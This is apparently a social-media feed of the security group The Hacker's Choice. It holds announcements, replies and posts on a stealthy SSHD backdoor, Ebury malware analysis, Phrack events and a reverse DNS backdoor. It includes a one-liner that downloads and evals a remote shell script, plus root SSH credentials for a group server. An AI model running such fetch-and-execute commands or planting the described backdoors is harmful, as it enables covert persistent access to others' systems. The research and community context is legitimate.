@usbee through your donations ❤️
The oldest and still active security research group - The Hacker's Choice. (Founded 1995) This is a group account, so different people post! :)
@elithebearded
Yes. Wildcards may help to hide them a bit longer. We find subdomains by various methods. CT stream is one but also searching other places…or user feedback:
@fwaggle on my Ubuntu 22.0 and 24.0 the ed25519 host public key is not in PEM but in the <type> <key> format (no <comment> section).
What distro uses PEM? I can try to convert it to the type-format and see if the daemon blindly accepts it.
@freddy it’s sourced by many methods, CT stream is one of the big data inputs (but also where most of the rubbish comes from - which we try to filter out before adding to the database).
THC Release 💥: The world’s largest IP<>Domain database: https://ip.thc.org
All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.
Updated monthly.
Try: curl https://ip.thc.org/1.1.1.1
Raw data: https://ip.thc.org/docs/bulk-data-access
(The fine work of messede 👌)
What does everyone think? Need feedback before release tomorrow :)
@lp0_on_fire it will work fine without systemctl. Any way to restart the sshd will work, either by waiting for a reboot or sending a SIGTERM.
@agowa338 Can't see how rhost is better. rhosts-trick requires the attacker to drop at least 2 new files to the target and change at least 1 line in the sshd_config (HostbasedAuthentication; a line that raises a red flag).
Our trick adds no new file to the system and only needs 1 line to the config (without raising a red flag).
Please explain if I got this wrong.
Can anyone test my *SMALLEST* SSHD backdoor?
- Survives updates.
- Does not use ~/.ssh/authorized_keys or PAM modules.
- Does not create any new file.
Just SSHD trickery.
Source at https://thc.org/tips
Stealth died 😢 A member of Team-Teso, Phrack staff, and many other groups. A true hacker—perhaps as true as a hacker can ever be. WE MISS YOU. 🩷
More: https://thc.org/404
<stealth> we had joy we had fun we had a rootshell on a sun.
Ebury Version 1.8.2.e6
Memory dump from live processes now available (sshd and systemd-udev). De-crypted and De-obfuscated. Enjoy.
{eval,"$({curl,-SsfL,https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh})"}
### hackshell now detects Ebury ###
Ebury SSHD backdoor?? on 400,000 hosts?
Let's fuck around and find out. (Why +s on the .so file???)
Dissect, understand & ridicule. Join the group effort at https://thc.org/ops or SSH straight into the server and check ~/ebury:
ssh -o "SetEnv SECRET=lYQkdQHIuQyTJngVtIskqRLx" root@adm.segfault.net (password is 'segfault')
INTERVIEW of "MB" WhereWarlocksStayUpLate:
https://wherewarlocksstayuplate.com/interview/mohammed-bagha/
You have inspired many. We are fans:⚡️🌊🎠
🇩🇪 German speaking only: THC member and @phrack staff on @heiseonline about Phrack's 40th, hacking and life in general.
Inject LUA scripts into a running Linux Process like a boss, by stealth/team-teso:
Friend of ours is testing his PoC to DISABLE XMR mining pools.
Revenge for all those pesty XMR miners installed by script kiddies. Tool destroys the ENTIRE wallet: stopping all xmr-rig miners worldwide (of the same wallet).
Looking for more WALLETs: https://wallet.hellknight.xyz/walletinfo1.php
Please help and save a baby seal.
PHONY AWARD ceremony at the PHRACK PARTY at @why2025camp hosted by @Emerson @thc and tmp.out
VOTE (by shouting) for the “Biggest Security Facepalm” and more. Legends like Hegseth and Crowdstrike have been nominated and informed.
Winning prize is the privilege to be trolled by us and pay for phrack's next print release :>
PHRACK is coming to #DEFCON! We're printing ~10,000 zines and giving an hour-long talk you won't want to miss! Stay tuned. 🔥 #40yrsOfPhrack #phrack72
Dear UNC5174/China, you have violated THC's Terms & Conditions ("to be used for good purpose and academic research only").
May want to discuss this with your therapist. 🤷‍♂️
Generate your own python-implant of a reverse DNS backdoor. https://thc.org/tips => 6.vi Smallest reverse DNS-tunnel Backdoor.